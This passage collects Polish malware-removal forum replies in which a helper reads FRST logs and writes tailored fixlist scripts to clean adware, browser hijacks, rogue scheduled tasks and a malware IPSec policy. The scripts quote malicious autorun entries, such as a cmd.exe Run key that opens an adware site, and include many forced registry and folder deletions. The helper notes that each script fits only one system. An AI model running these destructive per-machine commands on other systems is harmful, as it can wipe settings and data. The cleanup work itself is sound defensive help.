samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt oraz logi z folderu C:\AdwCleaner (nie uruchamiaj narzędzia ponownie, chodzi o poprzednie wyniki).

Za opisywane zachowanie odpowiada pozycja "CMD" w starcie. Są też inne problemy do rozwiązania. Akcja: 1. Odinstaluj Adobe Flash Player 17 NPAPI (to wtyczka dla produktów Mozilla, których tu brak), odpadek Mozilla Maintenance Service oraz Pokki Download Helper. Również uruchom deinstalację pozycji Podstawowe programy Windows Live i w deinstalatorze wybierz komponent Windows Messenger - ten komunikator w ogóle już nie działa, zastąpił go Skype. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-251673657-1254408106-2500988348-1000\...\Run: [CMD] => cmd.exe /c start http://zenigameblinger.org && exit Task: {092AB6B0-CE39-4E68-9F8E-8486B116A1A8} - \Escolade No Task File Task: {3532CFDF-7718-4118-A50E-573A5AB9C513} - \EPUpdater No Task File Task: {4A6BDC9F-879E-4CD0-BE07-56A830702D6D} - System32\Tasks\{810220B7-FDAE-43A6-AC78-36A936A32D81} => pcalua.exe -a "E:\GRY\Hidden & Dangerous 2\hd2.exe" -d "E:\GRY\Hidden & Dangerous 2" Task: {6928C77D-AF3C-4D93-8BEC-3F09D8A5CF2D} - System32\Tasks\{7EFFE912-D9BF-4EEA-BF85-00B94E5D5190} => pcalua.exe -a C:\Users\qvvas\Downloads\games.for.windows.live_cw_downloader_9206_gry.exe -d C:\Users\qvvas\Downloads Task: {AAC6B21D-8065-4B60-877D-8E83D8090C90} - System32\Tasks\RunAsStdUser Task => C:\Users\qvvas\AppData\Local\Oxy\Application\oxy.exe Task: {DB7E317A-25AF-4DA3-9416-F21A93C1C347} - System32\Tasks\{213C9B63-F8B9-44BA-B5E9-30A0ADA6DB6D} => pcalua.exe -a C:\Users\qvvas\Downloads\DXWnd\dxwnd.exe -d C:\Users\qvvas\Downloads\DXWnd IFEO\bitguard.exe: [Debugger] tasklist.exe IFEO\bprotect.exe: [Debugger] tasklist.exe IFEO\bpsvc.exe: [Debugger] tasklist.exe IFEO\browserdefender.exe: [Debugger] tasklist.exe IFEO\browserprotect.exe: [Debugger] tasklist.exe IFEO\browsersafeguard.exe: [Debugger] tasklist.exe IFEO\dprotectsvc.exe: [Debugger] tasklist.exe IFEO\jumpflip: [Debugger] tasklist.exe IFEO\protectedsearch.exe: [Debugger] tasklist.exe IFEO\searchinstaller.exe: [Debugger] tasklist.exe IFEO\searchprotection.exe: [Debugger] tasklist.exe IFEO\searchprotector.exe: [Debugger] tasklist.exe IFEO\searchsettings.exe: [Debugger] tasklist.exe IFEO\searchsettings64.exe: [Debugger] tasklist.exe IFEO\snapdo.exe: [Debugger] tasklist.exe IFEO\stinst32.exe: [Debugger] tasklist.exe IFEO\stinst64.exe: [Debugger] tasklist.exe IFEO\umbrella.exe: [Debugger] tasklist.exe IFEO\utiljumpflip.exe: [Debugger] tasklist.exe IFEO\volaro: [Debugger] tasklist.exe IFEO\vonteera: [Debugger] tasklist.exe IFEO\websteroids.exe: [Debugger] tasklist.exe IFEO\websteroidsservice.exe: [Debugger] tasklist.exe S3 BRDriver64; \??\C:\ProgramData\BitRaider\BRDriver64.sys [X] S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X] S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X] S1 MpKsldda1d3a5; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{25DD5053-3A7E-47C1-A59A-BEC646E38ABC}\MpKsldda1d3a5.sys [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] CHR StartupUrls: Default -> "hxxp://www.default-search.net?sid=492&aid=221&itype=n&ver=12565&tm=386&src=hmp", "hxxp://www.default-search.net?sid=492&aid=221&itype=a&ver=12791&tm=386&src=hmp" SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope value is missing. SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} SearchScopes: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> {930C3C79-F264-46E5-AE27-EBF001D831C4} URL = http://www.idg.pl?q={searchTerms} SearchScopes: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL = http://www.default-search.net/search?sid=492&aid=221&itype=a&ver=12791&tm=386&src=ds&p={searchTerms} Toolbar: HKU\S-1-5-21-251673657-1254408106-2500988348-1000 -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - No File AlternateDataStreams: C:\Windows:4C1F7227F72BD04A C:\Program Files (x86)\Mozilla Firefox C:\Users\qvvas\AppData\Roaming\Microsoft\Windows\SendTo\DreamMail.lnk C:\Users\qvvas\AppData\Roaming\Microsoft\Windows\SendTo\The Bat!.LNK Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v AlcoholAutomount /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Clownfish /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "DAEMON Tools Lite" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Gyazo /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v KiesAirMessage /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v KiesPreload /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v RGSC /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v uTorrent /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Yontoo Desktop" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder /v Curse.lnk /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Nvtmru /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v AllShareAgent /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v CloneCDTray /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v "DT BEN" /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v KiesTrayAgent /f Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Problem tworzą zadania w Harmonogramie wprowadzone przez instalacje typu PUP/adware. Ponadto, są tu nie wyczyszczone dobrze przekierowania adware sweet-page.com. Do wdrożenia: 1. Odinstaluj zbędnik Akamai NetSession Interface oraz stare wersje Java 7 Update 67, Java 7 Update 67 (64-bit). 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {4D317395-FBFA-485F-9C01-71FA3BA19244} - \SMupdate1 No Task File Task: {9F750A06-160F-4AD4-9167-1DFBAAB38483} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 Task: {BF0B6628-821B-4357-B2B5-3EA0C214973C} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X] S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] U2 V2iMount; No ImagePath S3 VBoxDrv; \??\C:\Program Files\Oracle\VirtualBox\VBoxDrv.sys [X] HKLM-x32\...\Run: [fst_pl_128] => [X] Winlogon\Notify\igfxcui: igfxdev.dll [X] HKU\S-1-5-21-1224429344-3065566498-1723742715-1000\...\MountPoints2: {7b331285-e5b6-11e3-9e85-de6b8c8e8418} - F:\SETUP.EXE HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-page.com/?type=hp&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-page.com/?type=hp&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} HKU\S-1-5-21-1224429344-3065566498-1723742715-1000\Software\Microsoft\Internet Explorer\Main,Start Page = HKU\S-1-5-21-1224429344-3065566498-1723742715-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-page.com/?type=hp&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} SearchScopes: HKU\S-1-5-21-1224429344-3065566498-1723742715-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-page.com/web/?type=ds&ts=1405035027&from=cor&uid=SamsungXSSDX840XEVOX120GB_S1D5NSBF400010R&q={searchTerms} BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll No File FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2013-11-15] (Microsoft Corporation) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll No File FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml [2014-12-09] C:\Program Files (x86)\mozilla firefox\plugins C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Docudesk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Product Key Finder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Softendo.com C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Softendo Games World.lnk C:\Users\Mateusz\AppData\Roaming\Microsoft\Word\kubiak%20spr%20(1)304324832316986679\kubiak%20spr%20(1).docx.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, błąd nie powinien się już pokazać. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt.

Program AdMuncher jest OK. Został zapewne zainstalowany z powodu zalewu reklam przez adware. Istotnie, "Dynamo Combo" w Google Chrome to nic dobrego, adware to jest zresztą podparte politykami Google blokującymi usuwanie. Źródłem adware był portal dobreprogramy.pl - w Temp jest niebudzący wątpliwości plik ICReinstall_Adobe-Reader(12627)-dp.exe: KLIK. Działania do przeprowadzenia: 1. Przez Dodaj/Usuń programy odinstaluj stare niebezpieczne wersje: Adobe Flash Player ActiveX, Adobe Flash Player Plugin, Java 7 Update 65, Java™ 6 Update 32, Java™ 6 Update 7, Java™ SE Runtime Environment 6, Opera 9.51. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HomePage: Default -> hxxp://www.wp.pl/ CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hp&ts=1421849315&from=cor&uid=FUJITSUXMHY2200BH_K429T832ADRBT832ADRBX" GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe C:\Documents and Settings\All Users\Menu Start\Programy\PL-2303 USB-Serial Driver C:\Documents and Settings\user\Dane aplikacji\Mozilla C:\Documents and Settings\user\Moje dokumenty\CERTYFIKATY\Skrót do CRL-2003-11-11.lnk C:\Documents and Settings\user\Pulpit\Skrót do CryptoCard Suite.lnk C:\Documents and Settings\user\Pulpit\Skrót do HASPUserSetup.lnk C:\Documents and Settings\user\Pulpit\Skrót do Wykazy KIR S.A..lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Adobe Reader 8.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\avast! Free Antivirus.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Menedżer CryptoCard Suite.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Menedżer komponentu technicznego.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Mozilla Firefox.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Nero StartSmart Essentials.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Skrót (2) do CryptoCard_Suite_1.20.0039_setup.exe.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Skrót do 20100728_Instrukcja_odnawiania_certyfikatów.lnk C:\Documents and Settings\user\Pulpit\Nieużywane skróty pulpitu\Skrót do zamówienie.lnk C:\Program Files\Dynamo Combo C:\Program Files\Mozilla Firefox Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Dynamo Combo. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zainstaluj IE8: KLIK. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Potwierdź ustąpienie problemu reklam.

Przedstaw co wykonałeś - jeśli sprawa była rozwiązywana na innym forum podaj link do tematu.

1. Przez Panel sterowania odinstaluj adware Strong Signal oraz instalacę sponsorowaną McAfee Security Scan Plus. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 IHProtect Service; C:\Program Files (x86)\XTab\ProtectService.exe [158896 2015-01-16] (XTab system) R2 Service Mgr StrongSignal; C:\ProgramData\0780f478-67ce-4ec3-98db-39a65f4618ce\plugincontainer.exe [581368 2015-03-05] () HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://isearch.omiga-plus.com/?type=hppp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://isearch.omiga-plus.com/web/?type=ds&ts=1422911775&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://isearch.omiga-plus.com/web/?type=ds&ts=1422911775&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://isearch.omiga-plus.com/?type=hppp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://isearch.omiga-plus.com/?type=hppp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422911775&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://isearch.omiga-plus.com/web/?type=ds&ts=1422911775&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} HKU\S-1-5-21-2067980254-2302860552-500229903-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://isearch.omiga-plus.com/?type=hppp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T HKU\S-1-5-21-2067980254-2302860552-500229903-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://isearch.omiga-plus.com/?type=hppp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T HKU\S-1-5-21-2067980254-2302860552-500229903-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://isearch.omiga-plus.com/web/?type=dspp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} HKU\S-1-5-21-2067980254-2302860552-500229903-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://isearch.omiga-plus.com/web/?type=dspp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=dspp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&ts=1422911841&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&ts=1422911841&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://isearch.omiga-plus.com/web/?type=dspp&ts=1422911826&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> {A702B04C-0985-4BCC-96CD-9BB033E7C7BF} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&ts=1422911841&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2067980254-2302860552-500229903-1001 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=TOSHIBAXMQ01ABF050_942RCBE7TXX942RCBE7T&ts=1422911841&type=default&q={searchTerms} BHO-x32: IETabPage Class -> {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} -> C:\Program Files (x86)\XTab\SupTab.dll (Thinknice Co. Limited) FF HKLM-x32\...\Firefox\Extensions: [fftoolbar2014@etech.com] - C:\Users\Martaa\AppData\Roaming\Mozilla\Firefox\Profiles\k4czelmd.default\extensions\fftoolbar2014@etech.com C:\Program Files\AVAST Software C:\Program Files (x86)\XTab C:\Program Files (x86)\Common Files\0780f478-67ce-4ec3-98db-39a65f4618ce C:\ProgramData\0780f478-67ce-4ec3-98db-39a65f4618ce C:\ProgramData\AVAST Software Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f CMD: sc config "Internet Manager. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

FRST pobiera informację o typie instalacji z rejestru. Skoro przeglądarka została odinstalowana, a detekcja nadal ma miejsce, deinstalacja była niepełna i zostały w rejestrze klucze związane z instalacją "dev". Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}] "ap"="-dev-multi-chrome" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}] "ap"="2.0-dev-multi-chrome" 1. Jeśli w systemie nie ma żadnego innego produktu Google (np. Google Earth, Google Talk, Picasa), można skasować w całości te klucze: HKLM\SOFTWARE\Google HKLM\SOFTWARE\Wow6432Node\Google 2. Jeśli jednak są inne produkty Google, to należy zawęzić usuwanie tylko do kluczy trzymających informację o Google Chrome "dev": HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}

posled Na przyszłość: proszę trzymaj się zasad działu. Każdy ma mieć osobny temat, mimo że problemem jest ta sama infekcja. Nie ma dekodera do CryptoWall. Zastanawia mnie też skąd informacja o dekoderze do "starszych wersji", bo nie licząc wysoko pozycjonowanych blogów z nierzetelnymi informacjami wciskającymi wątpliwy SpyHunter jako "usuwacz" i polecającymi użyć dekoder do innej infekcji (to nie działa), nie jest mi wiadome nic na temat istnienia takowego narzędzia do starszych wersji CryptoWall. dontpanic Tak sądziłam, problem z połączeniem ze stronami wynika z polityki IPSec wprowadzonej przez malware. W starszej wersji FRST polityka nie była skanowana: HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{66f7f99a-e864-4c16-90dc-885445b72e32} Ponadto jest aktywny Jelbrus Secure Web, o którym mówiłam, oraz kilka innych śmieci. Akcje do przeprowadzenia: 1. Przez Panel sterowania odinstaluj adware NetMon oraz przy okazji wszystkie stare wersje Adobe. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Live Malware Protection; C:\windows\mlwps.exe [239104 2015-03-04] (AV Security Software) [File not signed] R2 PrivoxyService; C:\Program Files (x86)\Jelbrus Secure Web\privoxy.exe [371200 2015-03-07] (The Privoxy team - www.privoxy.org) [File not signed] S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] Task: {5ECCE46D-12AC-4B29-8679-B80F178792DB} - System32\Tasks\Giga Perfect Uninstaller => C:\Program Files (x86)\PrivateVPN\gpup.exe [2015-03-04] () Task: {97321C05-0E82-4C01-87F1-B520F01FEB96} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {A17F9894-8E31-43AB-9A87-E91B7E2ADE04} - System32\Tasks\Malware Cleaner => C:\Users\Kuba\AppData\Roaming\65F3.tmp.exe Task: {F52ED5AF-2C3B-440C-B310-E6518C55342D} - 